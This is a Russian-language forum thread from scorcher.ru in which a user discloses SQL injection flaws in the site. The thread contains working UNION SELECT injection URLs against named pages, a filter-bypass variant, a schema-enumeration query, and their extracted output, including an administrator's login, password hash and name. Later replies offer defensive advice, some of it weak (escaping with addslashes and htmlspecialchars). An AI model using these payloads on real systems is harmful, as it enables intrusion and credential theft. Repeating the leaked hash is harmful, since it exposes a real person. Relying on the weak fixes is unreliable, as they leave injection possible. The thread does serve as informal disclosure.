Тема форума: «Об автохрокинге»

Опять меня стёрли. :'(
Администрация, я буду жаловаться!

Хрюкинг - клёвая штука. Хочу себе такую-же на сайт, и обращаюсь с официальным запросом к корпорации Fornitsoft о возможности лицензирования этой технологии.

Я сначала думал что это такой способ отстрела неугодных юзеров (типа меня). А оказывается это способ суицида для них ???

Ну, в общем, хочу патент

Я тебя не стирал!!! Ты так и торчишь от 22 марта в регистрации Roman-ом! Пароль забыл? Могу напомнить, если хочешь в письме!
Насчет использования хрюкинга у тебя на сайте – никаких возражений. А нельзя ли попросить тебя в ответ сделать статейку для этого сайта о флеше в смысле программирования и т.д.?

Ну. товарищ Nan! И садист же ты! ;D Это я по поводу твоей системы автохрюка - способа повышения адреналина в крови на 5 минут для всех излишне любопытствующих 8) ;D

__br__tag_ http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9 scorcher0@localhost 5.0.27 scorcher http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,emailAddress,passwd,realName),2,3,4,5,6,7,8,9+FROM+yabbse_members+LIMIT+0,1 coder af2dyfoj97nAU fornit

Вот пример ПряМоРУкОХрюКИНГА гагагага

дешевая инъекция.. Нужно еще немало знать, чтобы навредить. Хотя бы именя таблиц. Ну а если кто-то сильно навредит, то в логах по его ip обращусь к провайдеру, найду голубчика о будет он сильно горевать в итоге. А сайт быстро восстановлю. Дырки всегда можно найти. Люди ходят по улице без шлемов и любой может кирпичем ударить.

А пароль шифрованный :)

Короче, каждый сам решает преступник он или нет. Воры, к примеру, в точности как хакеры, гордятся своим умением потрошить лохов. Хакер - ничем не лучше вора.

Но спасибо, исправил защиту...

ух как срашно )) давай, юзай, айпиха есть, я даже не через проксю юзал индж ))


http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UNION/**/SELECT/**/0,concat_Ws(0x0b,table_name,column_name),2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+LIMIT+0,1

Перебирай лимитом все свои таблицы ))

хотел бы навредить, поверь уже давно это сделал бы и тем более для тебя не кинул бы чтобы ты её латал ))

"дешевая инъекция"
а какая еще есть не дешевая индж?

http://www.scorcher.ru/subject_index/subject_show.php?id=-4249/**/UnION/**/SELECT/**/0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9


чел то что ты фильтр кинул тебе не поможет ))

Надо сделать следующее

if !is_numeric($_POST['id']) die('fuck off');


также когда не цифровое значение

$id=addslashes($id);
$id=htmlspecialchars($id);
mysql_query(SELECT * FROM WHERE myid='$id');

обьязательно в запросах ставь ' и слешируй удачи

все, сибо еще разок :) а че ты такой агрессивный?

 

с чего ты взял что я агрессивный )) я споконый как доска )) лан, кильни мой акк с сайта чтобы на мыло мессаги не приходили и проверь все переменные

в этой теме ввел что надо тож есть баги, исправляй, подставляй ' там где цифры, буш баги видеть

Туда же

http://scorcher.ru/journal/show_news.php?id='
http://scorcher.ru/forum/index.php?board=7&action=display&threadid='&start=30

Как вариант, есть проги вроде xspider. Можно поставить копию сайта на локальную виртуальную машину и проверить с помощью сканера.

Для функции mysql_query можно написать функцию обёртки, которая бы фильтровала запросы к БД и одновременно делала лог запросов, которые вызвали ошибку. Это самый простой, хоть и самый ненадёжный способ.

Вторая вариация дубовых способов: фильтровать все GET/POST запросы на моменте первого обращения к PHP коду. Поскольку переменных, которые изменяются извне не так уж много, написать такой фильтр несложно и достаточно вставить его в одном месте, например config.php (setting.php) файле, лишь бы этот файл обязательно подключался к скриптам в самом начале.

О дырах форума можно подробнее узнать по ссылке:

securityvulns.ru

В поиске ввести: "Yabb SE SQL Injection" или "Yabb SE exploit", "Yabb SE xss"

Дабы не своровали FTP пароли, пока будешь лазить по таким сайтам, нужно установить Avira ( http://free-av.com ) и усердно молится

На самом деле современная версия этого движка ( YaBB SE ==> SMF ) куда более устойчива ко взлому. Такого рода проблем там нет.

Спасибо всем поучаствовавшим и посочувствовавшим :)

форум написан с нуля, в нем нет ничего от Yabb кроме намеков :) только движок расширенного редактора - не мой.

"удивляюсь нану - успевает и машеников разоблачать и хацкеров"

я думаю если бы я индж не выложил врядли бы он узнал